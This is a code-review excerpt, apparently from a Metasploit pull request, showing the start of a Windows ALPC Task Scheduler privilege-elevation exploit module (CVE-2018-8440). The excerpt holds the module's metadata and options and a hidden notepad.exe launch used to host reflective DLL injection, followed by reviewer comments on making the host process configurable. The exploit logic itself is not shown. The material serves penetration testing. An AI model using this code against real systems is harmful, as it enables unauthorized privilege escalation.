modules/exploits/windows/local/alpc_taskscheduler.rb

```diff
@@ -0,0 +1,194 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'         #TODO: Do we need this?
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Microsoft Windows ALPC Task Scheduler Local Privilege Elevation',
+      'Description'    => %q(
+        #TODO
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'SandboxEscaper',       # Original discovery and PoC
+          'bwatters-r7',          # msf module
+          'asoto-r7',             # msf module
+          'Jacob Robles'          # msf module
+        ],
+      'Platform'       => ['win'],
+      'SessionTypes'   => ['meterpreter','shell'],    #TODO: syntax for shell?
+      'Targets'        =>
+        [
+          ['Windows x64', { 'Arch' => ARCH_X64 }]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 27 2018',
+      'References'     =>
+        [
+          ['CVE', '2018-8440'],
+          ['URL', 'https://github.com/SandboxEscaper/randomrepo/'],
+        ],
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'False'
+        }
+    ))
+
+    register_options([
+      OptString.new('PAYLOAD_NAME',
+        [false, 'The filename for the payload to be used on the target host if USE_INJECTION=false (%RAND%.exe by default).', nil]),
+      OptString.new('PATH',
+        [false, 'Path to write the payload (%TEMP% by default).', nil]),
+    ])
+  end
+
+  def setup_process
+    begin
+      print_status('Launching notepad to host the exploit...')
+      notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
```

Comment:
This is a comment for basically all our Windows LPE exploits (not just this one):

Would it be worth considering making the target process customisable? Default to `notepad.exe` but allow the user to configure their own option?

Reply:
I'll add that as an option.

Reply:
Funny, we had been discussing that when I brought up your `ms10_015_kitrap0d`. :)